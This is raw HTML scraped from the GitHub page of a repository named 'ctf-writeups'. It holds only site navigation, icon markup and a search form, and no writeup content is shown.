9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="162845937" data-scoped-search-url="/KEERRO/ctf-writeups/search" data-owner-scoped-search-url="/users/KEERRO/search" data-unscoped-search-url="/search" data-turbo="false" action="/KEERRO/ctf-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="I5BiAoYI82CFsfhY1gAAOmMET4coN2q8LRUneXUenRh73qOdE0T05jvYk4N/xdwj4QhaCpG4m2cvnV4ZwoKadw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> KEERRO </span> <span>/</span> ctf-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
